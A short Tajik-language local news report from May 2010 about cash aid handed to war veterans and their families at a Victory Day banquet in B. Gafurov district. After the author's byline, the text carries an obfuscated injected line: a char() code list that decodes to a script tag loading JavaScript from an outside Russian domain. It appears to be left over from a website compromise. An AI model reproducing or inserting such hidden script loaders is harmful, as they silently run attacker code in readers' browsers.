9.05.2010
Кӯмакпулӣ ба иштирокчиёни Ҷ. Б. В
Имрӯз баъд аз анҷоми чорабинии идонаи ноҳияи Б. Ғафуров бахшида ба 65- солагии Иди Ғалаба дар тарабхонаи «Амонҷон» зиёфати идона барои иштирокчиёни Ҷанги Бузурги Ватанӣ ороста шуд. Дар ин чорабиниӣ ба 134 аз ҷумла ба 108- нафар иштирокчиёни Ҷанги Бузурги Ватанӣ, 7- нафар оилаҳои бесаробон монда ва 20- нафар шахсони дар ақибгоҳ хизмат намуда аз номи мақомоти иҷроияи ҳокимияти давлатии вилояти Суғд 200 сомонӣ ва аз номи мақомоти иҷроияи ҳокимияти давлатии ноҳияи Б. Ғафуров 150 сомонӣ кӯмакпулӣ супорида шуд. Кӯмакпулиҳоро муовини аввали раиси вилояти Суғд Ваҳҳоб Набиев ва раиси ноҳияи Б. Ғафуров Лутфулло Муҳиддинов супориданд. Баъдан родмардони ватан тайи чанд муддат дар ҳавои созу суруд шодмонӣ доштанд.
Афзал Босолиев
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)265b20cf4ebd8291259c6a2c24907cb9.js" type="text/javascript">

